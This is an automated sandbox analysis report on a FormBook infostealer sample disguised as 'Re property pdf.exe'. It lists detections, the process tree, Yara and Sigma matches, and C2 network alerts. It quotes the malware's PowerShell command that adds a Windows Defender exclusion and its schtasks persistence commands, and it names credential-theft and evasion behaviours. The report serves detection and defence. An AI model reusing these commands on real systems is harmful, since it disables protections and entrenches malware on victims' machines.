Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Re property pdf.exe

Overview

General Information

Sample name:Re property pdf.exe
Analysis ID:1537675
MD5:a217ff7da729f56faf0bb3de4ad87f40
SHA1:991801525b52069bb48c8c2907dcb587c592ce11
SHA256:a9d4aa43728b39fde9ba1ae406c10904369c6ccfbeed1c347b847b0e8ca6bcb1
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Re property pdf.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Re property pdf.exe" MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
    • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7704 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Re property pdf.exe (PID: 7824 cmdline: "C:\Users\user\Desktop\Re property pdf.exe" MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
      • uGMCFMVqKoR.exe (PID: 3980 cmdline: "C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PresentationHost.exe (PID: 1376 cmdline: "C:\Windows\SysWOW64\PresentationHost.exe" MD5: C6671F8B9F073785FD617661AD1F1C45)
          • firefox.exe (PID: 5752 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • hwOHPmqcegxcxb.exe (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
    • schtasks.exe (PID: 8056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hwOHPmqcegxcxb.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe" MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
    • hwOHPmqcegxcxb.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe" MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ef13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17162:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.Re property pdf.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.Re property pdf.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ef13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17162:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          6.2.Re property pdf.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            6.2.Re property pdf.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e113:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16362:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", ProcessId: 7668, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", ProcessId: 7668, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, ParentImage: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, ParentProcessId: 7852, ParentProcessName: hwOHPmqcegxcxb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp", ProcessId: 8056, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", ProcessId: 7704, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", ProcessId: 7668, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", ProcessId: 7704, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-19T12:57:04.005504+020028554651A Network Trojan was detected192.168.2.4497623.33.130.19080TCP
            2024-10-19T12:57:27.617419+020028554651A Network Trojan was detected192.168.2.449888172.67.181.18680TCP
            2024-10-19T12:57:41.162826+020028554651A Network Trojan was detected192.168.2.449965104.223.44.19580TCP
            2024-10-19T12:57:54.615907+020028554651A Network Trojan was detected192.168.2.450019203.161.41.20480TCP
            2024-10-19T12:58:07.936908+020028554651A Network Trojan was detected192.168.2.4500233.33.130.19080TCP
            2024-10-19T12:58:22.594449+020028554651A Network Trojan was detected192.168.2.450027221.128.225.5780TCP
            2024-10-19T12:58:36.149413+020028554651A Network Trojan was detected192.168.2.450031199.59.243.22780TCP
            2024-10-19T12:58:49.613095+020028554651A Network Trojan was detected192.168.2.450035172.67.196.9080TCP
            2024-10-19T12:59:02.923816+020028554651A Network Trojan was detected192.168.2.4500393.33.130.19080TCP
            2024-10-19T12:59:16.264611+020028554651A Network Trojan was detected192.168.2.4500433.33.130.19080TCP
            2024-10-19T12:59:29.649501+020028554651A Network Trojan was detected192.168.2.4500473.33.130.19080TCP
            2024-10-19T12:59:44.717271+020028554651A Network Trojan was detected192.168.2.450051129.226.56.20080TCP
            2024-10-19T12:59:58.617220+020028554651A Network Trojan was detected192.168.2.45005584.32.84.3280TCP
            2024-10-19T13:00:13.330521+020028554651A Network Trojan was detected192.168.2.4500593.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-19T12:57:19.980760+020028554641A Network Trojan was detected192.168.2.449843172.67.181.18680TCP
            2024-10-19T12:57:22.531220+020028554641A Network Trojan was detected192.168.2.449858172.67.181.18680TCP
            2024-10-19T12:57:25.081677+020028554641A Network Trojan was detected192.168.2.449873172.67.181.18680TCP
            2024-10-19T12:57:33.502533+020028554641A Network Trojan was detected192.168.2.449919104.223.44.19580TCP
            2024-10-19T12:57:36.076138+020028554641A Network Trojan was detected192.168.2.449935104.223.44.19580TCP
            2024-10-19T12:57:38.646681+020028554641A Network Trojan was detected192.168.2.449950104.223.44.19580TCP
            2024-10-19T12:57:46.915593+020028554641A Network Trojan was detected192.168.2.449996203.161.41.20480TCP
            2024-10-19T12:57:49.499537+020028554641A Network Trojan was detected192.168.2.450012203.161.41.20480TCP
            2024-10-19T12:57:52.075550+020028554641A Network Trojan was detected192.168.2.450018203.161.41.20480TCP
            2024-10-19T12:58:00.290772+020028554641A Network Trojan was detected192.168.2.4500203.33.130.19080TCP
            2024-10-19T12:58:02.812516+020028554641A Network Trojan was detected192.168.2.4500213.33.130.19080TCP
            2024-10-19T12:58:05.380413+020028554641A Network Trojan was detected192.168.2.4500223.33.130.19080TCP
            2024-10-19T12:58:14.950484+020028554641A Network Trojan was detected192.168.2.450024221.128.225.5780TCP
            2024-10-19T12:58:17.485658+020028554641A Network Trojan was detected192.168.2.450025221.128.225.5780TCP
            2024-10-19T12:58:20.030369+020028554641A Network Trojan was detected192.168.2.450026221.128.225.5780TCP
            2024-10-19T12:58:29.004494+020028554641A Network Trojan was detected192.168.2.450028199.59.243.22780TCP
            2024-10-19T12:58:31.054944+020028554641A Network Trojan was detected192.168.2.450029199.59.243.22780TCP
            2024-10-19T12:58:33.656681+020028554641A Network Trojan was detected192.168.2.450030199.59.243.22780TCP
            2024-10-19T12:58:41.958210+020028554641A Network Trojan was detected192.168.2.450032172.67.196.9080TCP
            2024-10-19T12:58:44.518082+020028554641A Network Trojan was detected192.168.2.450033172.67.196.9080TCP
            2024-10-19T12:58:47.127683+020028554641A Network Trojan was detected192.168.2.450034172.67.196.9080TCP
            2024-10-19T12:58:55.287439+020028554641A Network Trojan was detected192.168.2.4500363.33.130.19080TCP
            2024-10-19T12:58:57.831784+020028554641A Network Trojan was detected192.168.2.4500373.33.130.19080TCP
            2024-10-19T12:59:00.399260+020028554641A Network Trojan was detected192.168.2.4500383.33.130.19080TCP
            2024-10-19T12:59:09.146277+020028554641A Network Trojan was detected192.168.2.4500403.33.130.19080TCP
            2024-10-19T12:59:12.045609+020028554641A Network Trojan was detected192.168.2.4500413.33.130.19080TCP
            2024-10-19T12:59:13.710883+020028554641A Network Trojan was detected192.168.2.4500423.33.130.19080TCP
            2024-10-19T12:59:22.826779+020028554641A Network Trojan was detected192.168.2.4500443.33.130.19080TCP
            2024-10-19T12:59:25.373667+020028554641A Network Trojan was detected192.168.2.4500453.33.130.19080TCP
            2024-10-19T12:59:27.045458+020028554641A Network Trojan was detected192.168.2.4500463.33.130.19080TCP
            2024-10-19T12:59:36.817387+020028554641A Network Trojan was detected192.168.2.450048129.226.56.20080TCP
            2024-10-19T12:59:39.187204+020028554641A Network Trojan was detected192.168.2.450049129.226.56.20080TCP
            2024-10-19T12:59:42.151328+020028554641A Network Trojan was detected192.168.2.450050129.226.56.20080TCP
            2024-10-19T12:59:50.927787+020028554641A Network Trojan was detected192.168.2.45005284.32.84.3280TCP
            2024-10-19T12:59:53.527213+020028554641A Network Trojan was detected192.168.2.45005384.32.84.3280TCP
            2024-10-19T12:59:56.064035+020028554641A Network Trojan was detected192.168.2.45005484.32.84.3280TCP
            2024-10-19T13:00:04.340210+020028554641A Network Trojan was detected192.168.2.4500563.33.130.19080TCP
            2024-10-19T13:00:07.583242+020028554641A Network Trojan was detected192.168.2.4500573.33.130.19080TCP
            2024-10-19T13:00:10.114991+020028554641A Network Trojan was detected192.168.2.4500583.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-19T12:57:22.531220+020028563181A Network Trojan was detected192.168.2.449858172.67.181.18680TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeReversingLabs: Detection: 91%
            Multi AV Scanner detection for submitted file
            Source: Re property pdf.exeReversingLabs: Detection: 91%
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Re property pdf.exeJoe Sandbox ML: detected
            Source: Re property pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Re property pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: PresentationHost.pdbGCTL source: uGMCFMVqKoR.exe, 00000010.00000003.2118973099.0000000000A3B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uGMCFMVqKoR.exe, 00000010.00000002.4211703538.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: Re property pdf.exe, 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Re property pdf.exe, Re property pdf.exe, 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationHost.pdb source: uGMCFMVqKoR.exe, 00000010.00000003.2118973099.0000000000A3B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 4x nop then pop edi16_2_0596FC25
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 4x nop then mov esp, ebp16_2_0596DC53
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 4x nop then xor eax, eax16_2_059737CA
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 4x nop then pop edi16_2_05970284

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49858 -> 172.67.181.186:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49858 -> 172.67.181.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49843 -> 172.67.181.186:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49888 -> 172.67.181.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49935 -> 104.223.44.195:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49919 -> 104.223.44.195:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49950 -> 104.223.44.195:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49873 -> 172.67.181.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49965 -> 104.223.44.195:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 172.67.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 172.67.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 221.128.225.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49996 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50019 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 172.67.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 3.33.130.190:80
